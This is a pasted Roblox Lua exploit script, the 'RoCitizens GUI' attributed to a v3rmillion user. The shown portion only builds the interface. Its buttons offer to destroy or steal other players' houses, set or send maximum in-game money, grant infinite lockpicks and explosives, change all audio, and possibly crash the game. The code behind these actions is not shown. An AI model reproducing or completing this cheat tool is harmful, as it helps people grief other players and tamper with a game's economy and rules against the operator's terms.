Vzurxy

Untitled

Jul 29th, 2018
492
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 80.45 KB | None | 0 0
  1. local Obj = nil
  2. local Succ = pcall(function()
  3. local RoCitizens = Instance.new("ScreenGui")
  4. local Main = Instance.new("Frame")
  5. local Title = Instance.new("TextLabel")
  6. local MadeBy = Instance.new("TextLabel")
  7. local Functions = Instance.new("Frame")
  8. local Func5 = Instance.new("Frame")
  9. local DestroyLbl = Instance.new("TextLabel")
  10. local DestroyBut = Instance.new("TextButton")
  11. local Func4 = Instance.new("Frame")
  12. local TeleportLbl = Instance.new("TextLabel")
  13. local Teleport = Instance.new("TextButton")
  14. local Func3 = Instance.new("Frame")
  15. local TeleportLbl_2 = Instance.new("TextLabel")
  16. local Teleport_2 = Instance.new("TextButton")
  17. local Func2 = Instance.new("Frame")
  18. local MoneyBox = Instance.new("TextBox")
  19. local SendMoney = Instance.new("TextButton")
  20. local SetMoneyLbl = Instance.new("TextLabel")
  21. local Func1 = Instance.new("Frame")
  22. local MoneyBox_2 = Instance.new("TextBox")
  23. local SetMoney = Instance.new("TextButton")
  24. local SetMoneyLbl_2 = Instance.new("TextLabel")
  25. local Func7 = Instance.new("Frame")
  26. local PermsLbl = Instance.new("TextLabel")
  27. local Permissions = Instance.new("TextButton")
  28. local Func6 = Instance.new("Frame")
  29. local AudioChange = Instance.new("TextLabel")
  30. local Change = Instance.new("TextButton")
  31. local AudioBox = Instance.new("TextBox")
  32. local Func8 = Instance.new("Frame")
  33. local LockpickLbl = Instance.new("TextLabel")
  34. local Lockpick = Instance.new("TextButton")
  35. local Func9 = Instance.new("Frame")
  36. local ExplosivesLbl = Instance.new("TextLabel")
  37. local Explosives = Instance.new("TextButton")
  38. local Func10 = Instance.new("Frame")
  39. local Clothing = Instance.new("TextLabel")
  40. local Clothes = Instance.new("TextButton")
  41. local Func11 = Instance.new("Frame")
  42. local FurnitureLbl = Instance.new("TextLabel")
  43. local Furniture = Instance.new("TextButton")
  44. local Func12 = Instance.new("Frame")
  45. local House = Instance.new("TextLabel")
  46. local HouseSave = Instance.new("TextButton")
  47. local HouseName = Instance.new("TextBox")
  48. local Func16 = Instance.new("Frame")
  49. local Anti = Instance.new("TextLabel")
  50. local AntiD = Instance.new("TextButton")
  51. local Func13 = Instance.new("Frame")
  52. local House_2 = Instance.new("TextLabel")
  53. local HouseLoad = Instance.new("TextButton")
  54. local HouseName_2 = Instance.new("TextBox")
  55. local Func14 = Instance.new("Frame")
  56. local Signs = Instance.new("TextLabel")
  57. local SignsB = Instance.new("TextButton")
  58. local SignsText = Instance.new("TextBox")
  59. local Func15 = Instance.new("Frame")
  60. local Crash = Instance.new("TextLabel")
  61. local CrashB = Instance.new("TextButton")
  62. local Players = Instance.new("Frame")
  63. local Title_2 = Instance.new("TextLabel")
  64. local Players_2 = Instance.new("Frame")
  65. local AllPlayers = Instance.new("TextButton")
  66. local PlayerBOX = Instance.new("TextBox")
  67. --Properties:
  68. RoCitizens.Name = "RoCitizens"
  69. RoCitizens.Parent = game.Workspace.Players.PlayerGui
  70.  
  71. Main.Name = "Main"
  72. Main.Parent = RoCitizens
  73. Main.Active = true
  74. Main.BackgroundColor3 = Color3.new(0.333333, 0.666667, 1)
  75. Main.BorderSizePixel = 0
  76. Main.Draggable = true
  77. Main.Position = UDim2.new(0.100000001, 0, 0.100000001, 0)
  78. Main.Selectable = true
  79. Main.Size = UDim2.new(0, 300, 0, 550)
  80.  
  81. Title.Name = "Title"
  82. Title.Parent = Main
  83. Title.BackgroundColor3 = Color3.new(1, 1, 1)
  84. Title.BackgroundTransparency = 1
  85. Title.Size = UDim2.new(1, 0, 0, 30)
  86. Title.Font = Enum.Font.Bodoni
  87. Title.Text = "RoCitizens GUI"
  88. Title.TextColor3 = Color3.new(0, 0, 0)
  89. Title.TextSize = 20
  90. Title.TextStrokeColor3 = Color3.new(1, 1, 1)
  91. Title.TextStrokeTransparency = 0.69999998807907
  92.  
  93. MadeBy.Name = "MadeBy"
  94. MadeBy.Parent = Main
  95. MadeBy.BackgroundColor3 = Color3.new(1, 1, 1)
  96. MadeBy.BackgroundTransparency = 1
  97. MadeBy.Position = UDim2.new(0, 0, 0, 35)
  98. MadeBy.Size = UDim2.new(1, 0, 0, 30)
  99. MadeBy.Font = Enum.Font.Bodoni
  100. MadeBy.Text = "Made by: FalconPunch @v3rmillion"
  101. MadeBy.TextColor3 = Color3.new(0, 0, 0)
  102. MadeBy.TextSize = 20
  103. MadeBy.TextStrokeColor3 = Color3.new(1, 1, 1)
  104. MadeBy.TextStrokeTransparency = 0.69999998807907
  105.  
  106. Functions.Name = "Functions"
  107. Functions.Parent = Main
  108. Functions.Active = true
  109. Functions.BackgroundColor3 = Color3.new(1, 1, 1)
  110. Functions.BackgroundTransparency = 1
  111. Functions.BorderSizePixel = 0
  112. Functions.Position = UDim2.new(0, 0, 0, 70)
  113. Functions.Selectable = true
  114. Functions.Size = UDim2.new(1, 0, 1, -70)
  115.  
  116. Func5.Name = "Func5"
  117. Func5.Parent = Functions
  118. Func5.BackgroundColor3 = Color3.new(1, 1, 1)
  119. Func5.BackgroundTransparency = 1
  120. Func5.Position = UDim2.new(0, 0, 0, 120)
  121. Func5.Size = UDim2.new(1, 0, 0, 25)
  122.  
  123. DestroyLbl.Name = "DestroyLbl"
  124. DestroyLbl.Parent = Func5
  125. DestroyLbl.BackgroundColor3 = Color3.new(1, 1, 1)
  126. DestroyLbl.BackgroundTransparency = 1
  127. DestroyLbl.Position = UDim2.new(0, 3, 0, 0)
  128. DestroyLbl.Size = UDim2.new(0, 200, 0, 25)
  129. DestroyLbl.Font = Enum.Font.Bodoni
  130. DestroyLbl.Text = "Destroy Selected Player's House"
  131. DestroyLbl.TextColor3 = Color3.new(0, 0, 0)
  132. DestroyLbl.TextSize = 15
  133. DestroyLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
  134. DestroyLbl.TextStrokeTransparency = 0.69999998807907
  135. DestroyLbl.TextWrapped = true
  136. DestroyLbl.TextXAlignment = Enum.TextXAlignment.Left
  137.  
  138. DestroyBut.Name = "DestroyBut"
  139. DestroyBut.Parent = Func5
  140. DestroyBut.BackgroundColor3 = Color3.new(1, 1, 1)
  141. DestroyBut.Position = UDim2.new(0, 200, 0, 0)
  142. DestroyBut.Size = UDim2.new(0.300000012, 0, 0, 25)
  143. DestroyBut.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  144. DestroyBut.Font = Enum.Font.ArialBold
  145. DestroyBut.Text = "Destroy"
  146. DestroyBut.TextColor3 = Color3.new(1, 1, 1)
  147. DestroyBut.TextSize = 14
  148. DestroyBut.TextStrokeTransparency = 0
  149.  
  150. Func4.Name = "Func4"
  151. Func4.Parent = Functions
  152. Func4.BackgroundColor3 = Color3.new(1, 1, 1)
  153. Func4.BackgroundTransparency = 1
  154. Func4.Position = UDim2.new(0, 0, 0, 90)
  155. Func4.Size = UDim2.new(1, 0, 0, 25)
  156.  
  157. TeleportLbl.Name = "TeleportLbl"
  158. TeleportLbl.Parent = Func4
  159. TeleportLbl.BackgroundColor3 = Color3.new(1, 1, 1)
  160. TeleportLbl.BackgroundTransparency = 1
  161. TeleportLbl.Position = UDim2.new(0, 3, 0, 0)
  162. TeleportLbl.Size = UDim2.new(0, 200, 0, 25)
  163. TeleportLbl.Font = Enum.Font.Bodoni
  164. TeleportLbl.Text = "Steal Selected Player's House"
  165. TeleportLbl.TextColor3 = Color3.new(0, 0, 0)
  166. TeleportLbl.TextSize = 17
  167. TeleportLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
  168. TeleportLbl.TextStrokeTransparency = 0.69999998807907
  169. TeleportLbl.TextWrapped = true
  170. TeleportLbl.TextXAlignment = Enum.TextXAlignment.Left
  171.  
  172. Teleport.Name = "Teleport"
  173. Teleport.Parent = Func4
  174. Teleport.BackgroundColor3 = Color3.new(1, 1, 1)
  175. Teleport.Position = UDim2.new(0, 200, 0, 0)
  176. Teleport.Size = UDim2.new(0.300000012, 0, 0, 25)
  177. Teleport.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  178. Teleport.Font = Enum.Font.ArialBold
  179. Teleport.Text = "Steal"
  180. Teleport.TextColor3 = Color3.new(1, 1, 1)
  181. Teleport.TextSize = 14
  182. Teleport.TextStrokeTransparency = 0
  183.  
  184. Func3.Name = "Func3"
  185. Func3.Parent = Functions
  186. Func3.BackgroundColor3 = Color3.new(1, 1, 1)
  187. Func3.BackgroundTransparency = 1
  188. Func3.Position = UDim2.new(0, 0, 0, 60)
  189. Func3.Size = UDim2.new(1, 0, 0, 25)
  190.  
  191. TeleportLbl_2.Name = "TeleportLbl"
  192. TeleportLbl_2.Parent = Func3
  193. TeleportLbl_2.BackgroundColor3 = Color3.new(1, 1, 1)
  194. TeleportLbl_2.BackgroundTransparency = 1
  195. TeleportLbl_2.Position = UDim2.new(0, 3, 0, 0)
  196. TeleportLbl_2.Size = UDim2.new(0, 200, 0, 25)
  197. TeleportLbl_2.Font = Enum.Font.Bodoni
  198. TeleportLbl_2.Text = "Teleport to Selected Player"
  199. TeleportLbl_2.TextColor3 = Color3.new(0, 0, 0)
  200. TeleportLbl_2.TextSize = 17
  201. TeleportLbl_2.TextStrokeColor3 = Color3.new(1, 1, 1)
  202. TeleportLbl_2.TextStrokeTransparency = 0.69999998807907
  203. TeleportLbl_2.TextWrapped = true
  204. TeleportLbl_2.TextXAlignment = Enum.TextXAlignment.Left
  205.  
  206. Teleport_2.Name = "Teleport"
  207. Teleport_2.Parent = Func3
  208. Teleport_2.BackgroundColor3 = Color3.new(1, 1, 1)
  209. Teleport_2.Position = UDim2.new(0, 185, 0, 0)
  210. Teleport_2.Size = UDim2.new(0.349999994, 0, 0, 25)
  211. Teleport_2.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  212. Teleport_2.Font = Enum.Font.ArialBold
  213. Teleport_2.Text = "Teleport"
  214. Teleport_2.TextColor3 = Color3.new(1, 1, 1)
  215. Teleport_2.TextSize = 14
  216. Teleport_2.TextStrokeTransparency = 0
  217.  
  218. Func2.Name = "Func2"
  219. Func2.Parent = Functions
  220. Func2.BackgroundColor3 = Color3.new(1, 1, 1)
  221. Func2.BackgroundTransparency = 1
  222. Func2.Position = UDim2.new(0, 0, 0, 30)
  223. Func2.Size = UDim2.new(1, 0, 0, 25)
  224.  
  225. MoneyBox.Name = "MoneyBox"
  226. MoneyBox.Parent = Func2
  227. MoneyBox.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
  228. MoneyBox.BorderColor3 = Color3.new(0, 0, 0)
  229. MoneyBox.Position = UDim2.new(0, 95, 0, 0)
  230. MoneyBox.Size = UDim2.new(0, 125, 0, 25)
  231. MoneyBox.Font = Enum.Font.Arial
  232. MoneyBox.Text = "$2,147,483,647"
  233. MoneyBox.TextColor3 = Color3.new(1, 1, 1)
  234. MoneyBox.TextSize = 17
  235. MoneyBox.TextStrokeTransparency = 0
  236.  
  237. SendMoney.Name = "SendMoney"
  238. SendMoney.Parent = Func2
  239. SendMoney.BackgroundColor3 = Color3.new(1, 1, 1)
  240. SendMoney.Position = UDim2.new(0, 225, 0, 0)
  241. SendMoney.Size = UDim2.new(0, 73, 0, 25)
  242. SendMoney.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  243. SendMoney.Font = Enum.Font.ArialBold
  244. SendMoney.Text = "Send"
  245. SendMoney.TextColor3 = Color3.new(1, 1, 1)
  246. SendMoney.TextSize = 14
  247. SendMoney.TextStrokeTransparency = 0
  248.  
  249. SetMoneyLbl.Name = "SetMoneyLbl"
  250. SetMoneyLbl.Parent = Func2
  251. SetMoneyLbl.BackgroundColor3 = Color3.new(1, 1, 1)
  252. SetMoneyLbl.BackgroundTransparency = 1
  253. SetMoneyLbl.Position = UDim2.new(0, 3, 0, 0)
  254. SetMoneyLbl.Size = UDim2.new(0, 200, 0, 25)
  255. SetMoneyLbl.Font = Enum.Font.Bodoni
  256. SetMoneyLbl.Text = "Send Money:"
  257. SetMoneyLbl.TextColor3 = Color3.new(0, 0, 0)
  258. SetMoneyLbl.TextSize = 17
  259. SetMoneyLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
  260. SetMoneyLbl.TextStrokeTransparency = 0.69999998807907
  261. SetMoneyLbl.TextWrapped = true
  262. SetMoneyLbl.TextXAlignment = Enum.TextXAlignment.Left
  263.  
  264. Func1.Name = "Func1"
  265. Func1.Parent = Functions
  266. Func1.BackgroundColor3 = Color3.new(1, 1, 1)
  267. Func1.BackgroundTransparency = 1
  268. Func1.Size = UDim2.new(1, 0, 0, 25)
  269.  
  270. MoneyBox_2.Name = "MoneyBox"
  271. MoneyBox_2.Parent = Func1
  272. MoneyBox_2.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
  273. MoneyBox_2.BorderColor3 = Color3.new(0, 0, 0)
  274. MoneyBox_2.Position = UDim2.new(0, 85, 0, 0)
  275. MoneyBox_2.Size = UDim2.new(0, 125, 0, 25)
  276. MoneyBox_2.Font = Enum.Font.Arial
  277. MoneyBox_2.Text = "$2,147,483,647"
  278. MoneyBox_2.TextColor3 = Color3.new(1, 1, 1)
  279. MoneyBox_2.TextSize = 17
  280. MoneyBox_2.TextStrokeTransparency = 0
  281.  
  282. SetMoney.Name = "SetMoney"
  283. SetMoney.Parent = Func1
  284. SetMoney.BackgroundColor3 = Color3.new(1, 1, 1)
  285. SetMoney.Position = UDim2.new(0, 215, 0, 0)
  286. SetMoney.Size = UDim2.new(0, 75, 0, 25)
  287. SetMoney.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  288. SetMoney.Font = Enum.Font.ArialBold
  289. SetMoney.Text = "Set"
  290. SetMoney.TextColor3 = Color3.new(1, 1, 1)
  291. SetMoney.TextSize = 14
  292. SetMoney.TextStrokeTransparency = 0
  293.  
  294. SetMoneyLbl_2.Name = "SetMoneyLbl"
  295. SetMoneyLbl_2.Parent = Func1
  296. SetMoneyLbl_2.BackgroundColor3 = Color3.new(1, 1, 1)
  297. SetMoneyLbl_2.BackgroundTransparency = 1
  298. SetMoneyLbl_2.Position = UDim2.new(0, 3, 0, 0)
  299. SetMoneyLbl_2.Size = UDim2.new(0, 200, 0, 25)
  300. SetMoneyLbl_2.Font = Enum.Font.Bodoni
  301. SetMoneyLbl_2.Text = "Set Money:"
  302. SetMoneyLbl_2.TextColor3 = Color3.new(0, 0, 0)
  303. SetMoneyLbl_2.TextSize = 17
  304. SetMoneyLbl_2.TextStrokeColor3 = Color3.new(1, 1, 1)
  305. SetMoneyLbl_2.TextStrokeTransparency = 0.69999998807907
  306. SetMoneyLbl_2.TextWrapped = true
  307. SetMoneyLbl_2.TextXAlignment = Enum.TextXAlignment.Left
  308.  
  309. Func7.Name = "Func7"
  310. Func7.Parent = Functions
  311. Func7.BackgroundColor3 = Color3.new(1, 1, 1)
  312. Func7.BackgroundTransparency = 1
  313. Func7.Position = UDim2.new(0, 0, 0, 180)
  314. Func7.Size = UDim2.new(1, 0, 0, 25)
  315.  
  316. PermsLbl.Name = "PermsLbl"
  317. PermsLbl.Parent = Func7
  318. PermsLbl.BackgroundColor3 = Color3.new(1, 1, 1)
  319. PermsLbl.BackgroundTransparency = 1
  320. PermsLbl.Position = UDim2.new(0, 3, 0, 0)
  321. PermsLbl.Size = UDim2.new(0, 200, 0, 25)
  322. PermsLbl.Font = Enum.Font.Bodoni
  323. PermsLbl.Text = "House Permissions"
  324. PermsLbl.TextColor3 = Color3.new(0, 0, 0)
  325. PermsLbl.TextSize = 17
  326. PermsLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
  327. PermsLbl.TextStrokeTransparency = 0.69999998807907
  328. PermsLbl.TextWrapped = true
  329. PermsLbl.TextXAlignment = Enum.TextXAlignment.Left
  330.  
  331. Permissions.Name = "Permissions"
  332. Permissions.Parent = Func7
  333. Permissions.BackgroundColor3 = Color3.new(1, 1, 1)
  334. Permissions.Position = UDim2.new(0, 135, 0, 0)
  335. Permissions.Size = UDim2.new(0.519999981, 0, 0, 25)
  336. Permissions.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  337. Permissions.Font = Enum.Font.ArialBold
  338. Permissions.Text = "OFF"
  339. Permissions.TextColor3 = Color3.new(1, 0, 0)
  340. Permissions.TextSize = 14
  341. Permissions.TextStrokeTransparency = 0.5
  342.  
  343. Func6.Name = "Func6"
  344. Func6.Parent = Functions
  345. Func6.BackgroundColor3 = Color3.new(1, 1, 1)
  346. Func6.BackgroundTransparency = 1
  347. Func6.Position = UDim2.new(0, 0, 0, 150)
  348. Func6.Size = UDim2.new(1, 0, 0, 25)
  349.  
  350. AudioChange.Name = "AudioChange"
  351. AudioChange.Parent = Func6
  352. AudioChange.BackgroundColor3 = Color3.new(1, 1, 1)
  353. AudioChange.BackgroundTransparency = 1
  354. AudioChange.Position = UDim2.new(0, 3, 0, 0)
  355. AudioChange.Size = UDim2.new(0, 200, 0, 25)
  356. AudioChange.Font = Enum.Font.Bodoni
  357. AudioChange.Text = "Change All Audio"
  358. AudioChange.TextColor3 = Color3.new(0, 0, 0)
  359. AudioChange.TextSize = 17
  360. AudioChange.TextStrokeColor3 = Color3.new(1, 1, 1)
  361. AudioChange.TextStrokeTransparency = 0.69999998807907
  362. AudioChange.TextWrapped = true
  363. AudioChange.TextXAlignment = Enum.TextXAlignment.Left
  364.  
  365. Change.Name = "Change"
  366. Change.Parent = Func6
  367. Change.BackgroundColor3 = Color3.new(1, 1, 1)
  368. Change.Position = UDim2.new(0, 215, 0, 0)
  369. Change.Size = UDim2.new(0.25, 0, 0, 25)
  370. Change.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  371. Change.Font = Enum.Font.ArialBold
  372. Change.Text = "Change"
  373. Change.TextColor3 = Color3.new(1, 1, 1)
  374. Change.TextSize = 14
  375. Change.TextStrokeTransparency = 0
  376.  
  377. AudioBox.Name = "AudioBox"
  378. AudioBox.Parent = Func6
  379. AudioBox.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
  380. AudioBox.BorderColor3 = Color3.new(0, 0, 0)
  381. AudioBox.Position = UDim2.new(0, 120, 0, 0)
  382. AudioBox.Size = UDim2.new(0, 90, 0, 25)
  383. AudioBox.Font = Enum.Font.Arial
  384. AudioBox.Text = "856173428"
  385. AudioBox.TextColor3 = Color3.new(1, 1, 1)
  386. AudioBox.TextSize = 17
  387. AudioBox.TextStrokeTransparency = 0
  388.  
  389. Func8.Name = "Func8"
  390. Func8.Parent = Functions
  391. Func8.BackgroundColor3 = Color3.new(1, 1, 1)
  392. Func8.BackgroundTransparency = 1
  393. Func8.Position = UDim2.new(0, 0, 0, 210)
  394. Func8.Size = UDim2.new(1, 0, 0, 25)
  395.  
  396. LockpickLbl.Name = "LockpickLbl"
  397. LockpickLbl.Parent = Func8
  398. LockpickLbl.BackgroundColor3 = Color3.new(1, 1, 1)
  399. LockpickLbl.BackgroundTransparency = 1
  400. LockpickLbl.Position = UDim2.new(0, 3, 0, 0)
  401. LockpickLbl.Size = UDim2.new(0, 200, 0, 25)
  402. LockpickLbl.Font = Enum.Font.Bodoni
  403. LockpickLbl.Text = "Infinite Lockpicks"
  404. LockpickLbl.TextColor3 = Color3.new(0, 0, 0)
  405. LockpickLbl.TextSize = 17
  406. LockpickLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
  407. LockpickLbl.TextStrokeTransparency = 0.69999998807907
  408. LockpickLbl.TextWrapped = true
  409. LockpickLbl.TextXAlignment = Enum.TextXAlignment.Left
  410.  
  411. Lockpick.Name = "Lockpick"
  412. Lockpick.Parent = Func8
  413. Lockpick.BackgroundColor3 = Color3.new(1, 1, 1)
  414. Lockpick.Position = UDim2.new(0, 135, 0, 0)
  415. Lockpick.Size = UDim2.new(0.519999981, 0, 0, 25)
  416. Lockpick.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  417. Lockpick.Font = Enum.Font.ArialBold
  418. Lockpick.Text = "OFF"
  419. Lockpick.TextColor3 = Color3.new(1, 0, 0)
  420. Lockpick.TextSize = 14
  421. Lockpick.TextStrokeTransparency = 0.5
  422.  
  423. Func9.Name = "Func9"
  424. Func9.Parent = Functions
  425. Func9.BackgroundColor3 = Color3.new(1, 1, 1)
  426. Func9.BackgroundTransparency = 1
  427. Func9.Position = UDim2.new(0, 0, 0, 240)
  428. Func9.Size = UDim2.new(1, 0, 0, 25)
  429.  
  430. ExplosivesLbl.Name = "ExplosivesLbl"
  431. ExplosivesLbl.Parent = Func9
  432. ExplosivesLbl.BackgroundColor3 = Color3.new(1, 1, 1)
  433. ExplosivesLbl.BackgroundTransparency = 1
  434. ExplosivesLbl.Position = UDim2.new(0, 3, 0, 0)
  435. ExplosivesLbl.Size = UDim2.new(0, 200, 0, 25)
  436. ExplosivesLbl.Font = Enum.Font.Bodoni
  437. ExplosivesLbl.Text = "Infinite Explosives"
  438. ExplosivesLbl.TextColor3 = Color3.new(0, 0, 0)
  439. ExplosivesLbl.TextSize = 17
  440. ExplosivesLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
  441. ExplosivesLbl.TextStrokeTransparency = 0.69999998807907
  442. ExplosivesLbl.TextWrapped = true
  443. ExplosivesLbl.TextXAlignment = Enum.TextXAlignment.Left
  444.  
  445. Explosives.Name = "Explosives"
  446. Explosives.Parent = Func9
  447. Explosives.BackgroundColor3 = Color3.new(1, 1, 1)
  448. Explosives.Position = UDim2.new(0, 135, 0, 0)
  449. Explosives.Size = UDim2.new(0.519999981, 0, 0, 25)
  450. Explosives.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  451. Explosives.Font = Enum.Font.ArialBold
  452. Explosives.Text = "OFF"
  453. Explosives.TextColor3 = Color3.new(1, 0, 0)
  454. Explosives.TextSize = 14
  455. Explosives.TextStrokeTransparency = 0.5
  456.  
  457. Func10.Name = "Func10"
  458. Func10.Parent = Functions
  459. Func10.BackgroundColor3 = Color3.new(1, 1, 1)
  460. Func10.BackgroundTransparency = 1
  461. Func10.Position = UDim2.new(0, 0, 0, 270)
  462. Func10.Size = UDim2.new(1, 0, 0, 25)
  463.  
  464. Clothing.Name = "Clothing"
  465. Clothing.Parent = Func10
  466. Clothing.BackgroundColor3 = Color3.new(1, 1, 1)
  467. Clothing.BackgroundTransparency = 1
  468. Clothing.Position = UDim2.new(0, 3, 0, 0)
  469. Clothing.Size = UDim2.new(0, 200, 0, 25)
  470. Clothing.Font = Enum.Font.Bodoni
  471. Clothing.Text = "Add All Clothing"
  472. Clothing.TextColor3 = Color3.new(0, 0, 0)
  473. Clothing.TextSize = 17
  474. Clothing.TextStrokeColor3 = Color3.new(1, 1, 1)
  475. Clothing.TextStrokeTransparency = 0.69999998807907
  476. Clothing.TextWrapped = true
  477. Clothing.TextXAlignment = Enum.TextXAlignment.Left
  478.  
  479. Clothes.Name = "Clothes"
  480. Clothes.Parent = Func10
  481. Clothes.BackgroundColor3 = Color3.new(1, 1, 1)
  482. Clothes.Position = UDim2.new(0, 135, 0, 0)
  483. Clothes.Size = UDim2.new(0.519999981, 0, 0, 25)
  484. Clothes.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  485. Clothes.Font = Enum.Font.ArialBold
  486. Clothes.Text = "Add"
  487. Clothes.TextColor3 = Color3.new(1, 1, 1)
  488. Clothes.TextSize = 14
  489. Clothes.TextStrokeTransparency = 0
  490.  
  491. Func11.Name = "Func11"
  492. Func11.Parent = Functions
  493. Func11.BackgroundColor3 = Color3.new(1, 1, 1)
  494. Func11.BackgroundTransparency = 1
  495. Func11.Position = UDim2.new(0, 0, 0, 300)
  496. Func11.Size = UDim2.new(1, 0, 0, 25)
  497.  
  498. FurnitureLbl.Name = "FurnitureLbl"
  499. FurnitureLbl.Parent = Func11
  500. FurnitureLbl.BackgroundColor3 = Color3.new(1, 1, 1)
  501. FurnitureLbl.BackgroundTransparency = 1
  502. FurnitureLbl.Position = UDim2.new(0, 3, 0, 0)
  503. FurnitureLbl.Size = UDim2.new(0, 200, 0, 25)
  504. FurnitureLbl.Font = Enum.Font.Bodoni
  505. FurnitureLbl.Text = "Add All Furniture"
  506. FurnitureLbl.TextColor3 = Color3.new(0, 0, 0)
  507. FurnitureLbl.TextSize = 17
  508. FurnitureLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
  509. FurnitureLbl.TextStrokeTransparency = 0.69999998807907
  510. FurnitureLbl.TextWrapped = true
  511. FurnitureLbl.TextXAlignment = Enum.TextXAlignment.Left
  512.  
  513. Furniture.Name = "Furniture"
  514. Furniture.Parent = Func11
  515. Furniture.BackgroundColor3 = Color3.new(1, 1, 1)
  516. Furniture.Position = UDim2.new(0, 135, 0, 0)
  517. Furniture.Size = UDim2.new(0.519999981, 0, 0, 25)
  518. Furniture.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  519. Furniture.Font = Enum.Font.ArialBold
  520. Furniture.Text = "Add"
  521. Furniture.TextColor3 = Color3.new(1, 1, 1)
  522. Furniture.TextSize = 14
  523. Furniture.TextStrokeTransparency = 0
  524.  
  525. Func12.Name = "Func12"
  526. Func12.Parent = Functions
  527. Func12.BackgroundColor3 = Color3.new(1, 1, 1)
  528. Func12.BackgroundTransparency = 1
  529. Func12.Position = UDim2.new(0, 0, 0, 330)
  530. Func12.Size = UDim2.new(1, 0, 0, 25)
  531.  
  532. House.Name = "House"
  533. House.Parent = Func12
  534. House.BackgroundColor3 = Color3.new(1, 1, 1)
  535. House.BackgroundTransparency = 1
  536. House.Position = UDim2.new(0, 3, 0, 0)
  537. House.Size = UDim2.new(0, 200, 0, 25)
  538. House.Font = Enum.Font.Bodoni
  539. House.Text = "Save House:"
  540. House.TextColor3 = Color3.new(0, 0, 0)
  541. House.TextSize = 17
  542. House.TextStrokeColor3 = Color3.new(1, 1, 1)
  543. House.TextStrokeTransparency = 0.69999998807907
  544. House.TextWrapped = true
  545. House.TextXAlignment = Enum.TextXAlignment.Left
  546.  
  547. HouseSave.Name = "HouseSave"
  548. HouseSave.Parent = Func12
  549. HouseSave.BackgroundColor3 = Color3.new(1, 1, 1)
  550. HouseSave.Position = UDim2.new(0, 215, 0, 0)
  551. HouseSave.Size = UDim2.new(0.25, 0, 0, 25)
  552. HouseSave.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  553. HouseSave.Font = Enum.Font.ArialBold
  554. HouseSave.Text = "Save"
  555. HouseSave.TextColor3 = Color3.new(1, 1, 1)
  556. HouseSave.TextSize = 14
  557. HouseSave.TextStrokeTransparency = 0
  558.  
  559. HouseName.Name = "HouseName"
  560. HouseName.Parent = Func12
  561. HouseName.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
  562. HouseName.BorderColor3 = Color3.new(0, 0, 0)
  563. HouseName.Position = UDim2.new(0, 90, 0, 0)
  564. HouseName.Size = UDim2.new(0, 120, 0, 25)
  565. HouseName.Font = Enum.Font.Arial
  566. HouseName.Text = "House 1"
  567. HouseName.TextColor3 = Color3.new(1, 1, 1)
  568. HouseName.TextSize = 17
  569. HouseName.TextStrokeTransparency = 0
  570.  
  571. Func16.Name = "Func16"
  572. Func16.Parent = Functions
  573. Func16.BackgroundColor3 = Color3.new(1, 1, 1)
  574. Func16.BackgroundTransparency = 1
  575. Func16.Position = UDim2.new(0, 0, 0, 450)
  576. Func16.Size = UDim2.new(1, 0, 0, 25)
  577.  
  578. Anti.Name = "Anti"
  579. Anti.Parent = Func16
  580. Anti.BackgroundColor3 = Color3.new(1, 1, 1)
  581. Anti.BackgroundTransparency = 1
  582. Anti.Position = UDim2.new(0, 3, 0, 0)
  583. Anti.Size = UDim2.new(0, 200, 0, 25)
  584. Anti.Font = Enum.Font.Bodoni
  585. Anti.Text = "Anti - House Destroy"
  586. Anti.TextColor3 = Color3.new(0, 0, 0)
  587. Anti.TextSize = 17
  588. Anti.TextStrokeColor3 = Color3.new(1, 1, 1)
  589. Anti.TextStrokeTransparency = 0.69999998807907
  590. Anti.TextWrapped = true
  591. Anti.TextXAlignment = Enum.TextXAlignment.Left
  592.  
  593. AntiD.Name = "AntiD"
  594. AntiD.Parent = Func16
  595. AntiD.BackgroundColor3 = Color3.new(1, 1, 1)
  596. AntiD.Position = UDim2.new(0, 150, 0, 0)
  597. AntiD.Size = UDim2.new(0.469999999, 0, 0, 25)
  598. AntiD.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  599. AntiD.Font = Enum.Font.ArialBold
  600. AntiD.Text = "OFF"
  601. AntiD.TextColor3 = Color3.new(1, 0, 0)
  602. AntiD.TextSize = 14
  603. AntiD.TextStrokeTransparency = 0.5
  604.  
  605. Func13.Name = "Func13"
  606. Func13.Parent = Functions
  607. Func13.BackgroundColor3 = Color3.new(1, 1, 1)
  608. Func13.BackgroundTransparency = 1
  609. Func13.Position = UDim2.new(0, 0, 0, 360)
  610. Func13.Size = UDim2.new(1, 0, 0, 25)
  611.  
  612. House_2.Name = "House"
  613. House_2.Parent = Func13
  614. House_2.BackgroundColor3 = Color3.new(1, 1, 1)
  615. House_2.BackgroundTransparency = 1
  616. House_2.Position = UDim2.new(0, 3, 0, 0)
  617. House_2.Size = UDim2.new(0, 200, 0, 25)
  618. House_2.Font = Enum.Font.Bodoni
  619. House_2.Text = "Load House:"
  620. House_2.TextColor3 = Color3.new(0, 0, 0)
  621. House_2.TextSize = 17
  622. House_2.TextStrokeColor3 = Color3.new(1, 1, 1)
  623. House_2.TextStrokeTransparency = 0.69999998807907
  624. House_2.TextWrapped = true
  625. House_2.TextXAlignment = Enum.TextXAlignment.Left
  626.  
  627. HouseLoad.Name = "HouseLoad"
  628. HouseLoad.Parent = Func13
